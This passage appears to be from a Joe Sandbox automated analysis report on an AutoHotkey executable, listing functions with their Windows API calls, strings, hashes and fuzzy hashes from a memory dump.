                                      • API String ID: 0-3371325577
                                      • Opcode ID: e289cd83311e990c22f21dff4b48f73f2d6a0ef5988d17e3250ec0243255fc8a
                                      • Instruction ID: 403a7620c2c2fdd0d72c4b3da8f0f2766dc39b37c56ee6285f47f1f86f31ed2e
                                      • Opcode Fuzzy Hash: e289cd83311e990c22f21dff4b48f73f2d6a0ef5988d17e3250ec0243255fc8a
                                      • Instruction Fuzzy Hash: 86F0A428A4091012DF3565288C137EB61A0DB71B16FD4886BF854C53C0F79CCDC4C2EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00484420 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00484437
                                      • GetTickCount.KERNEL32 ref: 00484450
                                      • IsWindow.USER32(00000000), ref: 0048446A
                                      • GetTickCount.KERNEL32 ref: 00484474
                                      • IsWindow.USER32(00000000), ref: 0048448F
                                        • Part of subcall function 0045F490: SendMessageTimeoutW.USER32(00000000,00000010,00000000,00000000,00000002,000001F4,?), ref: 0045F4A9
                                        • Part of subcall function 0045F490: GetWindowThreadProcessId.USER32(00000000,?), ref: 0045F4BD
                                        • Part of subcall function 0045F490: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0045F4D3
                                        • Part of subcall function 0045F490: TerminateProcess.KERNEL32(00000000,00000000), ref: 0045F4E2
                                        • Part of subcall function 0045F490: CloseHandle.KERNEL32(00000000), ref: 0045F4E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ProcessWindow$CountMessageTick$CloseHandleOpenPostSendTerminateThreadTimeout
                                      • String ID: ?-C
                                      • API String ID: 1366898224-529084794
                                      • Opcode ID: e9b634eb4191b3dd2f740d92a04f9ade6f465c0e276e8730f06235c8cc5be3e4
                                      • Instruction ID: 9ffa57109529b6633f79e548395238a5c432fc1b5d1be13bd0322142679e9397
                                      • Opcode Fuzzy Hash: e9b634eb4191b3dd2f740d92a04f9ade6f465c0e276e8730f06235c8cc5be3e4
                                      • Instruction Fuzzy Hash: 11F0283170030273D611777D6C85B3F3A844FC1F4CF14483AF605AA2E1EA69EC01826E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C380 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Interrupt$NoTimers$Priority
                                      • API String ID: 3832890014-3223323590
                                      • Opcode ID: d4acd4e402cc93bf1f51f9c32db97eeee8b8841bf0839f26bc9b6c265f7fc3b7
                                      • Instruction ID: f16713c71150c0f4a54a079feca92610c107978e789b91b71aa973e6bd543f6f
                                      • Opcode Fuzzy Hash: d4acd4e402cc93bf1f51f9c32db97eeee8b8841bf0839f26bc9b6c265f7fc3b7
                                      • Instruction Fuzzy Hash: 7EE09225AC191521CE1120395D437DF60854B50B07FD8867ABC14D02C0F38DCD81C1AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004AB702 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 004AB723
                                        • Part of subcall function 0049DF62: __getptd_noexit.LIBCMT ref: 0049DF65
                                        • Part of subcall function 0049DF62: __amsg_exit.LIBCMT ref: 0049DF72
                                      • __getptd.LIBCMT ref: 004AB734
                                      • __getptd.LIBCMT ref: 004AB742
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 537dfc7255d2be0cafcd0820cdf55bb1c534b0320ce8007d67348f54640e4629
                                      • Instruction ID: ca3b1d7ad069dbb9386ff367875a14fc625f560a4ce55cdfb62afa1bd11507c2
                                      • Opcode Fuzzy Hash: 537dfc7255d2be0cafcd0820cdf55bb1c534b0320ce8007d67348f54640e4629
                                      • Instruction Fuzzy Hash: 92E012345102088ECF14D769C45B7A937D4EB99319F5944B7E44DCB323C76CEC50458B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00455680 Relevance: 9.4, APIs: 6, Instructions: 393COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(?,-0000F939,00000000,?,00000000,00000000,00000000,00000000), ref: 0045596A
                                      • GetLastError.KERNEL32 ref: 00455970
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00455993
                                      • WideCharToMultiByte.KERNEL32(?,-0000F939,00000000,?,00010000,00000000,00000000,00000000), ref: 004559CB
                                      • MultiByteToWideChar.KERNEL32(000004B0,00000000,00010000,00000000,00000000,00000000), ref: 00455A03
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00010000,00000000,?,?), ref: 00455A2F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: 65ab9c99be0ed5a71a5eb4ae19f22be201836f94314bcc7e66ef52b62e76a6f9
                                      • Instruction ID: 0dd25a984bc58823cc0d9f9f3a0728df6356d0332b5d25c1e721d57ac511ae0d
                                      • Opcode Fuzzy Hash: 65ab9c99be0ed5a71a5eb4ae19f22be201836f94314bcc7e66ef52b62e76a6f9
                                      • Instruction Fuzzy Hash: 36D1F3716046019FD710DF18D890B3BB7A1EFC8326F14866AED198B382D739EC49C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F6C0 Relevance: 9.4, APIs: 6, Instructions: 370COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Unregister_memset
                                      • String ID:
                                      • API String ID: 2392160147-0
                                      • Opcode ID: 02161f978aaf72eef8d4f8bbb1335e075c942fa0905e7a85a0775cb9054f7f9a
                                      • Instruction ID: 7217b14692c7048fae6681bf1a95b232c7df4c8d591be2729b75319de405d111
                                      • Opcode Fuzzy Hash: 02161f978aaf72eef8d4f8bbb1335e075c942fa0905e7a85a0775cb9054f7f9a
                                      • Instruction Fuzzy Hash: 64E10560A083809AEB358F2484447677BA1AB12304F1845BFD4C5ABFD2D37CED8EC75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004AC4A0 Relevance: 9.3, APIs: 6, Instructions: 262COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateScopeTableHandlers.LIBCMT ref: 004AC5A1
                                      • __FindPESection.LIBCMT ref: 004AC5BB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FindHandlersScopeSectionTableValidate
                                      • String ID:
                                      • API String ID: 876702719-0
                                      • Opcode ID: 7a013d0c5d8106d021d7f500489f19406dab95ab609641f313480db279615ba4
                                      • Instruction ID: 2b5060a530d911210692ca2e4632e24c5838b4fbdbf168b7c2b95b22119d00ed
                                      • Opcode Fuzzy Hash: 7a013d0c5d8106d021d7f500489f19406dab95ab609641f313480db279615ba4
                                      • Instruction Fuzzy Hash: A591D336A00216DBCB65CF58D9C07AEB7A1EBA6714F15822BD815D7390E739EC01CB9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045B5D0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 390COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Caps_memset
                                      • String ID: 4$@
                                      • API String ID: 675830301-1528247400
                                      • Opcode ID: 2a6ad8970d5377bef85bab6a09cc5ca72a6e361fd0c168d9371709fc54fb0ed0
                                      • Instruction ID: 345be5edd868760c976f2915aba37b937ac8f700645dc57489b461cddc8d2f83
                                      • Opcode Fuzzy Hash: 2a6ad8970d5377bef85bab6a09cc5ca72a6e361fd0c168d9371709fc54fb0ed0
                                      • Instruction Fuzzy Hash: DDE19E356083428BD7248F16D8447AAB7E0FFC4316F54892EEC9983752D73DA94CCB8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00468493 Relevance: 9.1, APIs: 6, Instructions: 100windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00468001
                                      • SendMessageW.USER32(?,00000184,00000000,00000000), ref: 00468070
                                        • Part of subcall function 00473B90: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00473BAD
                                        • Part of subcall function 00473B90: GetWindowLongW.USER32(?,000000F0), ref: 00473BB9
                                        • Part of subcall function 00473B90: IsWindowVisible.USER32(?), ref: 00473BDA
                                        • Part of subcall function 00473B90: IsIconic.USER32(?), ref: 00473BED
                                        • Part of subcall function 00473B90: GetWindowRect.USER32(?,?), ref: 00473C51
                                        • Part of subcall function 00473B90: GetPropW.USER32(?,ahk_dlg), ref: 00473C60
                                        • Part of subcall function 00473B90: ShowWindow.USER32(00000000,00000000,?,ahk_dlg,?,?), ref: 00473C74
                                        • Part of subcall function 00473B90: GetUpdateRect.USER32(?,?,00000000), ref: 00473C9C
                                        • Part of subcall function 00473B90: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00473CAA
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004684F1
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00468504
                                      • SendMessageW.USER32(00000000,00001330,-00000001,00000000), ref: 0046851D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046852C
                                        • Part of subcall function 00473F30: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00473F47
                                      • SendMessageW.USER32(?,0000130C,-00000001,00000000), ref: 00468557
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$LongRect$IconicPropShowUpdateVisible_free
                                      • String ID:
                                      • API String ID: 3032506294-0
                                      • Opcode ID: 7d4d2a5b45b32c7a97fae66c7f650e451546cdbdd1522101d90dcd3c6bebfe7f
                                      • Instruction ID: 6ad5d380e51d9b94d348351c943cb2fe6b075b85640b63b8ea8c5ae536d1edf2
                                      • Opcode Fuzzy Hash: 7d4d2a5b45b32c7a97fae66c7f650e451546cdbdd1522101d90dcd3c6bebfe7f
                                      • Instruction Fuzzy Hash: 6C31D931644300ABD7209F24DC91F6B77A0AB84714F184A2FF6455B2C2EA79E945C75F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00462370 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetDim.OLEAUT32(?), ref: 0046237D
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0046239B
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004623B5
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004623CD
                                      • SafeArrayGetElemsize.OLEAUT32(?), ref: 004623F1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Bound$AccessDataElemsize
                                      • String ID:
                                      • API String ID: 505432365-0
                                      • Opcode ID: f1d6dca95195c3eab8c0c9643eca74b814f95ccd677d5f04d32bbc95c97bda09
                                      • Instruction ID: 7193f2b9c1eccf5cb6ccbf7b46c4b0afa726bf1159b0b4ff7b58cfe4ca11ba9d
                                      • Opcode Fuzzy Hash: f1d6dca95195c3eab8c0c9643eca74b814f95ccd677d5f04d32bbc95c97bda09
                                      • Instruction Fuzzy Hash: EA31B575604712AFD700DF28D98499ABBE8EF88310F40886EFD4597321E779E8448B67
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00474090 Relevance: 9.1, APIs: 6, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004740A0
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004740A9
                                      • SendMessageW.USER32(?,0000130A,00000000,?), ref: 004740CC
                                      • SendMessageW.USER32(?,0000132C,00000000,00000000), ref: 004740D8
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00474129
                                      • MapWindowPoints.USER32(?,?,?,00000002), ref: 00474144
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ClientLongPointsRect
                                      • String ID:
                                      • API String ID: 1955914217-0
                                      • Opcode ID: 23206af3ca8f9d19d7f1f66e4c9b45bef16a656f740c438cdc23d9d25fba4fc4
                                      • Instruction ID: 3b6ac11845cf5ae8bea7ed9671e068ac9b4ece1ce88cfba2416959e63b879658
                                      • Opcode Fuzzy Hash: 23206af3ca8f9d19d7f1f66e4c9b45bef16a656f740c438cdc23d9d25fba4fc4
                                      • Instruction Fuzzy Hash: D0219E71649301AFD304EF18CC49BAEBBE4FFD9700F14852EF59A56280D734AA45CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043D600 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0043D612
                                      • __fassign.LIBCMT ref: 0043D64B
                                        • Part of subcall function 0049BF9D: wcstoxl.LIBCMT ref: 0049BFAD
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      • __fassign.LIBCMT ref: 0043D67B
                                      • _wcsncpy.LIBCMT ref: 0043D6A7
                                      • _wcsncpy.LIBCMT ref: 0043D6CB
                                      • Shell_NotifyIconW.SHELL32(00000001), ref: 0043D6E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$_wcsncpy$IconNotifyShell__memsetwcstoxl
                                      • String ID:
                                      • API String ID: 551406035-0
                                      • Opcode ID: 8eff955c9bb006f65237bbba63d70de27cc4c9aba4ed05e485fff164441735bd
                                      • Instruction ID: 34107d8a8bcf8e22087f137028a84b51312ee7e386e6db294c5cb30486b0d047
                                      • Opcode Fuzzy Hash: 8eff955c9bb006f65237bbba63d70de27cc4c9aba4ed05e485fff164441735bd
                                      • Instruction Fuzzy Hash: 9C2184B09043006BD721AB10DC43BAF76E89F85708F04483EFA899A2C1E7799615874F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00454250 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 296COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsdup_free
                                      • String ID: ERCP$O$RegExMatch
                                      • API String ID: 2088533098-700926398
                                      • Opcode ID: e3e238dc134e5f3d01f0b873f3a3a279317dbd8525e29491b20340cacc5c75e7
                                      • Instruction ID: ea8ad2906619fc146426dc9989b6f8a3e09762169eb3fd2f1471537a94cb86d9
                                      • Opcode Fuzzy Hash: e3e238dc134e5f3d01f0b873f3a3a279317dbd8525e29491b20340cacc5c75e7
                                      • Instruction Fuzzy Hash: 61B1D171A00218AFCB14DF94C881AAFB7B5EF88319F14815AFD05AB352D738DD89CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414080 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ?$Invalid option.$Too few parameters passed to function.${All}
                                      • API String ID: 0-1706679301
                                      • Opcode ID: fe8263f7cdb13ce55d13f688e4b5c1948730f1a59beea3f630fe795c92b10d4d
                                      • Instruction ID: 4173d1b2080cd32b1f01f176dccef886bd7648e895e4ad34046d10058530c030
                                      • Opcode Fuzzy Hash: fe8263f7cdb13ce55d13f688e4b5c1948730f1a59beea3f630fe795c92b10d4d
                                      • Instruction Fuzzy Hash: 714147355483905AD321DA1898447EBBBD0ABF236AF08046FE9D047292C26DD9CDC3BF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00470850 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 004708BD
                                      • __itow.LIBCMT ref: 004708E5
                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0047093F
                                      • ShowWindow.USER32(?,00000000), ref: 0047099F
                                        • Part of subcall function 00470A70: __wcsicoll.LIBCMT ref: 00470A8C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$LongMessageSendShow__itow__wcsicoll
                                      • String ID: Submit
                                      • API String ID: 1467826441-949859957
                                      • Opcode ID: 2fc73557284eef67bae0e7f40888c28695654738bbe858f84b880eb11e29a91e
                                      • Instruction ID: a4dcbbb6ea5f337782531cf708bdd5abf8ef59ad2bcb37f8be4299c6d8067120
                                      • Opcode Fuzzy Hash: 2fc73557284eef67bae0e7f40888c28695654738bbe858f84b880eb11e29a91e
                                      • Instruction Fuzzy Hash: 4241B1B1905311EBE630EF55C880B9BF7A4BB41B10F118B1AF665672C2C7B4E884C7DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004102B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004102DB
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • GetTickCount.KERNEL32 ref: 004102F1
                                      • GetTickCount.KERNEL32 ref: 004103F4
                                      • PostMessageW.USER32(0002044A,00000312,?,00000000), ref: 00410417
                                      Strings
                                      • %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file), xrefs: 0041037C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$MessagePost_vswprintf_s
                                      • String ID: %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file)
                                      • API String ID: 134691662-3609671246
                                      • Opcode ID: 4a1e726e7df85e9ff3d7cbdd4e7c5b47b5fb186546a1bb74d1d9ee6d54b0ca72
